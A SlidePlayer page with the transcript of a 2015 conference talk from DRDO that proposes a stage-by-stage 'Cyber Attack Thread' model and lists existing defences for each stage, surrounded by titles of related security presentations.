Koustav Sadhukhan, Rao Arvind Mallari and Tarun Yadav DRDO, Ministry of Defense, INDIA Cyber Attack Thread: A Control-flow Based Approach to Deconstruct.

Slides:



Advertisements
Similar presentations
Intrusion Detection/Prevention Systems Charles Poff Bearing Point.
Advertisements

Lecture slides for “Computer Security: Principles and Practice”, 2/e, by William Stallings and Lawrie Brown, Chapter 9 “Firewalls and Intrusion Prevention.
1© Copyright 2011 EMC Corporation. All rights reserved. Anatomy of an Attack.
Computer Security: Principles and Practice Chapter 9 – Firewalls and Intrusion Prevention Systems.
Next Generation Endpoint Security Jason Brown Enterprise Solution Architect McAfee May 23, 2013.
By Hiranmayi Pai Neeraj Jain
1© Copyright 2011 EMC Corporation. All rights reserved. Advanced Persistent Threat Sachin Deshmanya & Srinivas Matta.
Lecture 14 Firewalls modified from slides of Lawrie Brown.
Defense-in-Depth Against Malicious Software Jeff Alexander IT Pro Evangelist Microsoft Australia
Common IS Threat Mitigation Strategies An overview of common detection and protection technologies Max Caceres CORE Security Technologies
LittleOrange Internet Security an Endpoint Security Appliance.
Controls for Information Security
Enterprise Network Security Accessing the WAN Lecture week 4.
INTRUSION DETECTION SYSTEMS Tristan Walters Rayce West.
2851A_C01. Microsoft Windows XP Service Pack 2 Security Technologies Bruce Cowper IT Pro Advisor Microsoft Canada.
eScan Total Security Suite with Cloud Security
Intranet, Extranet, Firewall. Intranet and Extranet.
Cyber Crime Tanmay S Dikshit.
1 Guide to Network Defense and Countermeasures Chapter 2.
1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks.
Agenda Review route summarization Cisco acquire Sourcefire Review Final Exam.
Honeypot and Intrusion Detection System
Module 14: Configuring Server Security Compliance
Principles of Computer Security: CompTIA Security + ® and Beyond, Third Edition © 2012 Principles of Computer Security: CompTIA Security+ ® and Beyond,
3-Protecting Systems Dr. John P. Abraham Professor UTPA.
Software Security Testing Vinay Srinivasan cell:
11 SECURING YOUR NETWORK PERIMETER Chapter 10. Chapter 10: SECURING YOUR NETWORK PERIMETER2 CHAPTER OBJECTIVES  Establish secure topologies.  Secure.
Network and Perimeter Security Paula Kiernan Senior Consultant Ward Solutions.
ANTIVIRUS SOFTWARE.  Antivirus software is the most widespread mechanism for defending individual hosts against threats associated with malicious software,
GSHRM Conference Cyber Security Education Shri Cockroft, CISO Piedmont Healthcare, Inc. September 21, 2015.
HIPS Host-Based Intrusion Prevention System By Ali Adlavaran & Mahdi Mohamad Pour (M.A. Team) Life’s Live in Code Life.
Computer Network Forensics Lecture 6 – Intrusion Detection © Joe Cleetus Concurrent Engineering Research Center, Lane Dept of Computer Science and Engineering,
Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.
Securing the Network Infrastructure. Firewalls Typically used to filter packets Designed to prevent malicious packets from entering the network or its.
Secure Wired Local Area Network( LAN ) By Sentuya Francis Derrick ID Module code:CT3P50N BSc Computer Networking London Metropolitan University.
Intrusion Detection System (IDS) Basics LTJG Lemuel S. Lawrence Presentation for IS Sept 2004.
Sky Advanced Threat Prevention
Connected Security Your best defense against advanced threats Anne Aarness – Intel Security.
Information Security In the Corporate World. About Me Graduated from Utica College with a degree in Economic Crime Investigation (ECI) in Spring 2005.
©2015 HEAT Software. All rights reserved. Proprietary & Confidential. Ransomware: How to Avoid Extortion Matthew Walker – VP Northern Europe.
NATIONAL CYBER SECURITY GOVERNANCE & EMERGING CYBER SECURITY THREATS
Russell Rice Senior Director, Product Management Skyport Systems
Role Of Network IDS in Network Perimeter Defense.
NETWORK SECURITY Definitions and Preventions Toby Wilson.
UNIX SYSTEM SECURITY Tanusree Sen Agenda Introduction Three Different Levels of Security Security Policies Security Technologies Future of.
Rapid Detection & Incident Response What, Why and How March 2016 Ft Gordon.
©2016 Check Point Software Technologies Ltd. 1 Latest threats…. Rolando Panez | Security Engineer RANSOMWARE.
NEXT GENERATION ATTACKS & EXPLOIT MITIGATIONS TECHNIQUES ID No: 1071 Name: Karthik GK ID: College: Sathyabama university.
Microsoft NDA Material Adwait Joshi Sr. Technical Product Manager Microsoft Corporation.
Chapter 11 – Cloud Application Development. Contents Motivation. Connecting clients to instances through firewalls. Cloud Computing: Theory and Practice.
Unit 2 Personal Cyber Security and Social Engineering Part 2.
 Terms:  “Security”: is a system’s ability to provide services while maintaining the five IA pillars  “Attack”: an action that violates one of the.
Using Honeypots to Improve Network Security Dr. Saleh Ibrahim Almotairi Research and Development Centre National Information Centre - Ministry of Interior.
Firewalls. Overview of Firewalls As the name implies, a firewall acts to provide secured access between two networks A firewall may be implemented as.
Understanding and breaking the cyber kill chain
Proactive Incident Response
Understanding Cyber Attacks: Technical Aspects of Cyber Kill Chain
CompTIA Security+ Study Guide (SY0-401)
Top 5 Open Source Firewall Software for Linux User
Critical Security Controls
A lustrum of malware network communication: Evolution & insights
Secure Software Confidentiality Integrity Data Security Authentication
Intelligence Driven Defense, The Next Generation SOC
Lesson Objectives Aims You should be able to:
CompTIA Security+ Study Guide (SY0-401)
11/17/2018 9:32 PM © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN.
Chapter 4: Protecting the Organization
How to Mitigate the Consequences What are the Countermeasures?
CS/IS 196 Final Exam Review
Protection Mechanisms in Security Management
Presentation transcript:

Koustav Sadhukhan, Rao Arvind Mallari and Tarun Yadav DRDO, Ministry of Defense, INDIA Cyber Attack Thread: A Control-flow Based Approach to Deconstruct and Mitigate Cyber Threats 2015 International Conference on Computing and Network Communications (CoCoNet'15)

Motivation 2 Evolution of Cyber Threats

Cyber Kill Chain 3 Reconaissance Delivery Exploitation Installation Command & Control Act on Objective

Cyber Attack Thread 4 Attack Vector Verification & Reconaissance Enticing the end-user Security Penetration Execution on Target System Internal Reconnaissance Information Exfiltration Cover Tracks

Attack Vector Verification and Reconnaissance 5 Reconnaissance Passive Reconnaissance Active Reconnaissance Attack Vector Verification Integration and Testing of components Based on target-specific scenario and configuration

Enticing the End-user 6 Targeting user , drive-by-downloads, malicious USB etc. Defence: spam filters, web application firewall, etc. Targeting third-party interactions with user Watering Hole attack

Security Penetration to reach the Target System 7 Inbound Network Security Intrusion Detection and Prevention System Signature based Anomaly based Stateful Protocol Analysis Example – SNORT, Surricata, BRO Network based Firewall Inbound System Security Anti-Virus Host based IDS Host based firewall Application Security User Awareness

Execution on Target System 8 Ability of attacker to execute crafted malicious content on targets system Exploit Career for the payload Takes advantage of the flaws and vulnerabilities in various software components Office applications, PDF Readers, Web browsers, OS, firmware etc. Defenses against Exploits Stack Based Stack Cookies or stack-guard Structured Exception Handler Protection overwrite Heap Based Safe unlinking Allocation order randomization Virtual Table Guard System-wide protection Address Space Layout Randomization Data Execution Prevention Control Flow Integrity

Execution on target System (contd.) 9 Payload Core component of the cyber attack Responsible to achieve the end-objective of the cyber attack Kinds Remote access toolkit, Rootkit, Bootkit, Dropper, Downloader Characteristics Stealthy Evasive Polymorphic Metamorphic Objectives Data Exfiltration Files, Keylogs, User-credentials - Persistence - Propagation Defences for Payload Types of Malware Detection Heuristic based Analysis and Detection Behavioral Analysis and Detection Cloud based detection Sandboxing

Internal Reconnaissance 10 Information Accessed By attackers Primary Tactical Information Secondary Strategic Information Defenses Security Information and Event Management(SIEM) Data Labelling Minimize Storage of Credentials Two Factor Authentication Access to System Logs restricted

Information Exfiltration 11 Channels available to Attacker TCP FTP HTTP POST/GET Others like , SSH, Instant Messages, Social Media, etc. Dropbox Covert Channels Defense Mechanisms Blacklists Statistical profiles Packet header mangling deploying DMZ limiting protocol support packet regeneration

Covering Tracks 12 Attacker’s Actions Data Elimination Data Manipulation Direct Attacks on Tools and Techniques Defender’s Counter Measures Remote Logging Facilities Log Correlation Distributed Forensics and Incident Response

Conclusion 13 Attackers Action at each stage was observed Corresponding to each stage, existing defense mechanisms listed Will help administrators and security professionals harden and secure their infrastructure against such complex attacks.

Thank You Doubts or Questions?? Contact:

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.